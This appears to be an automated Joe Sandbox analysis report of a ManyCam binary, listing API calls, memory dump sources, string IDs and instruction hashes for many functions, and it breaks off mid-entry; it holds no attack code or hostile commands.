                                                                                                                                            • Instruction Fuzzy Hash: FB0239B1900609AFDF24DFA8E985FEEB7F9FF44304F148569E419A7241EB30A945CB60
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _ftol
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2545261903-0
                                                                                                                                            • Opcode ID: baff1a2664fef83156a08e0b8aa338a55d51b8227e9f3c7981c76264f0bd77b5
                                                                                                                                            • Instruction ID: dbfaa8d66ab37705066815d8ce1021a4ed1dbd1f0eb798329183c6efa2d85629
                                                                                                                                            • Opcode Fuzzy Hash: baff1a2664fef83156a08e0b8aa338a55d51b8227e9f3c7981c76264f0bd77b5
                                                                                                                                            • Instruction Fuzzy Hash: 38515830600702CFC3159F21E66816AFBF4FF94794F52499EE1D792A68E730A8A5CF01
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,00536A39,000000FF,?,004E1A94,?,00000001,00000000,004E0575,00000001,00000000,00000000), ref: 004E22D4
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 004E22E8
                                                                                                                                            • _CxxThrowException.MSVCR80(004E1A94,0057CBF8), ref: 004E22F6
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(004E1A94,0057CBF8,?,?,?,00000000,00536A39,000000FF,?,004E1A94,?,00000001,00000000,004E0575,00000001,00000000), ref: 004E2305
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: map/set<T> too long
                                                                                                                                            • API String ID: 3248949544-1285458680
                                                                                                                                            • Opcode ID: 037b1c6f34042e82ce7b50c5ae10a42ae7eaf65c3770f3036ce6bbe0d0c371b4
                                                                                                                                            • Instruction ID: eb3dced5db3925a888724237d041c26940005993663a78e11fc02054abcc7e87
                                                                                                                                            • Opcode Fuzzy Hash: 037b1c6f34042e82ce7b50c5ae10a42ae7eaf65c3770f3036ce6bbe0d0c371b4
                                                                                                                                            • Instruction Fuzzy Hash: E7D10F70A002C99FCB04EFAAC991D6F777ABF89345B10455EF4119F366CA78AC01DBA4
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,?,00530F19,000000FF,?,0048A224,?,00000001,?,?,00000001,00000000,00000000), ref: 0048C904
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 0048C918
                                                                                                                                            • _CxxThrowException.MSVCR80(0048A224,0057CBF8), ref: 0048C926
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048A224,0057CBF8,?,?,?,00530F19,000000FF,?,0048A224,?,00000001,?,?,00000001,00000000,00000000), ref: 0048C935
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: map/set<T> too long
                                                                                                                                            • API String ID: 3248949544-1285458680
                                                                                                                                            • Opcode ID: 5d9bd5cfefa7126eaa9cce7f59cf12a6ec2056fb24f196b19c599b19faf1435e
                                                                                                                                            • Instruction ID: 781e3e5cdacf5d297dd74e0af013611e08a9c6e7430d9740113c692fd0013158
                                                                                                                                            • Opcode Fuzzy Hash: 5d9bd5cfefa7126eaa9cce7f59cf12a6ec2056fb24f196b19c599b19faf1435e
                                                                                                                                            • Instruction Fuzzy Hash: B0D1ED70A002499FCB04FFA5C891D6F7775EF8A708F20496EF6159B255CB38AD05CBA8
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,00000000,0052F989,000000FF,?,00474884,?,00000001,00000000,004A9763,00000001,00000000,00000000), ref: 00474CC4
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 00474CD8
                                                                                                                                            • _CxxThrowException.MSVCR80(00474884,0057CBF8), ref: 00474CE6
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(00474884,0057CBF8,?,?,?,00000000,0052F989,000000FF,?,00474884,?,00000001,00000000,004A9763,00000001,00000000), ref: 00474CF5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: map/set<T> too long
                                                                                                                                            • API String ID: 3248949544-1285458680
                                                                                                                                            • Opcode ID: fb5a5b0bfe5d7466eb37912541b6a1e1978402ae83b6b00b3775f69bc8b7d628
                                                                                                                                            • Instruction ID: 902e9eb1271cb93d2a72db74486b01d1d5c84e1b516abcfe74867b495f5f0d12
                                                                                                                                            • Opcode Fuzzy Hash: fb5a5b0bfe5d7466eb37912541b6a1e1978402ae83b6b00b3775f69bc8b7d628
                                                                                                                                            • Instruction Fuzzy Hash: 1ED1FB70A002099FCB04EFA5D891EEF7776AF89318B20855EF4159F295CB38AC51CBA5
                                                                                                                                            APIs
                                                                                                                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP80(map/set<T> too long,7EC02BB4,?,?,?,00530F49,000000FF,?,0048A514,?,00000001,?,?,00000001,00000000,00000000), ref: 0048CF54
                                                                                                                                            • std::bad_exception::bad_exception.LIBCMTD ref: 0048CF68
                                                                                                                                            • _CxxThrowException.MSVCR80(0048A514,0057CBF8), ref: 0048CF76
                                                                                                                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP80(0048A514,0057CBF8,?,?,?,00530F49,000000FF,?,0048A514,?,00000001,?,?,00000001,00000000,00000000), ref: 0048CF85
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                            • String ID: map/set<T> too long
                                                                                                                                            • API String ID: 3248949544-1285458680
                                                                                                                                            • Opcode ID: 6ffb65bce278b8fe47ce7c833305a1f3afc7f0cb37ed8eddf46bce9baa873d41
                                                                                                                                            • Instruction ID: 50f8718e498666fa4da98437a76d4638b1e2a723603710fac9882f3192207998
                                                                                                                                            • Opcode Fuzzy Hash: 6ffb65bce278b8fe47ce7c833305a1f3afc7f0cb37ed8eddf46bce9baa873d41
                                                                                                                                            • Instruction Fuzzy Hash: 1BD1AA70A002459FCB04FFA5D8D1EAF77B6BF89304B10495EF511AB396CA39A901CBE5
                                                                                                                                            APIs
                                                                                                                                            • GlobalAlloc.KERNEL32(00BD318D,?,?,00BCD370,8BFFFEFC,50242444), ref: 00BCC89F
                                                                                                                                            • GlobalSize.KERNEL32(00BD318D), ref: 00BCC8AB
                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000008), ref: 00BCC8BE
                                                                                                                                            • GlobalFree.KERNEL32(00BD318D), ref: 00BCC8DF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$Alloc$FreeSize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 716937079-0
                                                                                                                                            • Opcode ID: 54969a0e1d14d3d333b47b246dd439038ee2aba5196c820f848c5c8995732aee
                                                                                                                                            • Instruction ID: 508985e4daf172367521c093ef46e01339b591d933759279ab7a956d5ac67ad6
                                                                                                                                            • Opcode Fuzzy Hash: 54969a0e1d14d3d333b47b246dd439038ee2aba5196c820f848c5c8995732aee
                                                                                                                                            • Instruction Fuzzy Hash: 8001B1727052196F5B246B69BCA9A7BFBDEFB98661744402EF94AC3310DEA19D00C390
                                                                                                                                            APIs
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,00000008,00000001,?,?,00403181,?,?), ref: 00402BC0
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,00000008,00000001,?,00000000,?,00000000,?,0040120F), ref: 00402BD4
                                                                                                                                            • cvCreateImage.CXCORE099(?,?,00000020,00000003,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BE9
                                                                                                                                            • cvReleaseImage.CXCORE099(?,?,?,?,?,?,00000000,?,00000000,?,0040120F), ref: 00402BFE
                                                                                                                                            • cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C10
                                                                                                                                            • cvReleaseImage.CXCORE099(?,?,00000000,?,00000000,?,0040120F), ref: 00402C22
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Image$CreateRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3874174198-0
                                                                                                                                            • Opcode ID: 90bf2cca833fb2c28ec0a48af1516d2f96f179e9554cc466a05b48644bb4997a
                                                                                                                                            • Instruction ID: 6a9ac0958563a1589a8d938dd82cbe29a94ad790e47f913414e9d99cb75ce162
                                                                                                                                            • Opcode Fuzzy Hash: 90bf2cca833fb2c28ec0a48af1516d2f96f179e9554cc466a05b48644bb4997a
                                                                                                                                            • Instruction Fuzzy Hash: F901F9F590130176F630AB259D4EF4B76DCFF91701F04483AF55AA12C1F6B4E184C221
                                                                                                                                            Strings
                                                                                                                                            • Unknown filter heuristic method, xrefs: 00BB981D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Unknown filter heuristic method
                                                                                                                                            • API String ID: 0-3224722364
                                                                                                                                            • Opcode ID: 9f082e904c75eed330b1fd2711d1ca66a41d596ac3e5d2f7b057867ed122ec3f
                                                                                                                                            • Instruction ID: cbec6d1b4f738989f28ac096f9cef2459f5065c9a46e195794b04367f0213dbe
                                                                                                                                            • Opcode Fuzzy Hash: 9f082e904c75eed330b1fd2711d1ca66a41d596ac3e5d2f7b057867ed122ec3f
                                                                                                                                            • Instruction Fuzzy Hash: CD51B430600B0687D720AF65DD89BE7B7E4FF56344F1049ADE5E98B222EBB1E845C742
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00447FF0: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 00448006
                                                                                                                                            • Concurrency::details::SchedulerBase::GetPolicy.LIBCMTD ref: 00434C17
                                                                                                                                              • Part of subcall function 004DB530: _DebugHeapAllocator.LIBCPMTD ref: 004DB54A
                                                                                                                                            • memset.MSVCR80 ref: 00434C2B
                                                                                                                                              • Part of subcall function 00447E60: SendMessageW.USER32(?,00001132,00000000,yLC), ref: 00447E78
                                                                                                                                            • Concurrency::task_options::get_scheduler.LIBCPMTD ref: 00434CEC
                                                                                                                                              • Part of subcall function 004DAF40: _DebugHeapAllocator.LIBCPMTD ref: 004DAF57
                                                                                                                                            • memset.MSVCR80 ref: 00434D1D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocatorDebugHeapMessageSendmemset$Base::Concurrency::details::Concurrency::task_options::get_schedulerPolicyScheduler
                                                                                                                                            • String ID: pzC
                                                                                                                                            • API String ID: 1527497025-2444570644
                                                                                                                                            • Opcode ID: e3d9d7585f77d899c6d2de3521e35a6c3d02375cb3cf3d8ffcf042e74bc981e3
                                                                                                                                            • Instruction ID: ed1ee3073941a6660e753338659c4a22794240fa1e9d27d03445b3c6d8f704d4
                                                                                                                                            • Opcode Fuzzy Hash: e3d9d7585f77d899c6d2de3521e35a6c3d02375cb3cf3d8ffcf042e74bc981e3
                                                                                                                                            • Instruction Fuzzy Hash: 9C610CB1D01118DBDB14DFA5D891BEEBBB5FF48304F2041AEE10A67281DB386A45CF99
                                                                                                                                            APIs
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,20BE36BE,?,?,?,?,00BDC6CD,000000FF), ref: 00B928A7
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,?,?,?,?,?,?,?,000000FF), ref: 00B928D5
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,000000FF), ref: 00B92906
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B92937
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B92968
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B92999
                                                                                                                                            • ??2@YAPAXI@Z.MSVCR80(00000010,00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FF), ref: 00B929CA
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ??2@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1033339047-0
                                                                                                                                            • Opcode ID: 9b057b9e533050bb77c67dab2cfc4816063fa117c6fa73d2160d4f68546c6d73
                                                                                                                                            • Instruction ID: 7e25b8255ef59f6a2e2261fa52ca77cd6930c1a7a29112e5add75e85c8eb061e
                                                                                                                                            • Opcode Fuzzy Hash: 9b057b9e533050bb77c67dab2cfc4816063fa117c6fa73d2160d4f68546c6d73
                                                                                                                                            • Instruction Fuzzy Hash: DA415EB1A48301AFDB51EF79889672BBAD4AF84300F144CBEE499C7381EB74D4448F92
                                                                                                                                            APIs
                                                                                                                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004083C6
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,?,00000003,<A>,00000003), ref: 00408424
                                                                                                                                            • CompareStringW.KERNEL32(00000400,00000001,?,00000004,</A>,00000004), ref: 00408474
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompareString$lstrlen
                                                                                                                                            • String ID: </A>$<A>
                                                                                                                                            • API String ID: 1657112622-2122467442
                                                                                                                                            • Opcode ID: 71153d6a453ea1603edaace69c389d9b4173073ffd4576bfc9ed4d047b5a66fa
                                                                                                                                            • Instruction ID: 8d4014fe370238e856f28d0c67f96b0aed6e5c53389ece421d0f182d8b12796b
                                                                                                                                            • Opcode Fuzzy Hash: 71153d6a453ea1603edaace69c389d9b4173073ffd4576bfc9ed4d047b5a66fa
                                                                                                                                            • Instruction Fuzzy Hash: CB5121B4A0421ADFDB04CF88C990BAEB7B2FF84304F108159E915AB3D0DB75A946CF95
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                            • Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            • Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: getenvmallocsscanf
                                                                                                                                            • String ID: %ld%c$JPEGMEM$x
                                                                                                                                            • API String ID: 677315340-3402169052
                                                                                                                                            • Opcode ID: 495c451a687e2d49d351bc00779b056c9d085188ce9cacd4a5c773e25dfe07ee
                                                                                                                                            • Instruction ID: 61a1f59de2976d145acded7f64d4f60de8106f02b6ca44f724eb2250f1f57a0a
                                                                                                                                            • Opcode Fuzzy Hash: 495c451a687e2d49d351bc00779b056c9d085188ce9cacd4a5c773e25dfe07ee
                                                                                                                                            • Instruction Fuzzy Hash: 094153B54087019FD720CF1DC884956FBF4FF82348B108AAEE09A8B661E771E919CF91
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB6AA
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB711
                                                                                                                                              • Part of subcall function 004CB670: _DebugHeapAllocator.LIBCPMTD ref: 004CB76F
